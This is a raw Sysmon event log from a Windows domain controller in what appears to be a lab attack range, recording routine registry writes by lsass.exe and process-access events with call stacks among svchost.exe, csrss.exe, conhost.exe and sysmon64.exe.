13241300x80000000000000005269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ed9f-0xf9a7b5e5) 13241300x80000000000000005268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:00.190{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda8-0x5b6c1de5) 10341000x80000000000000005267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000005266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.143{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2801-00000000A301}3968C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2801-00000000A301}3968C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.127{59A5CD1D-90A0-6005-2701-00000000A301}13404424C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2601-00000000A301}804C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2701-00000000A301}1340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 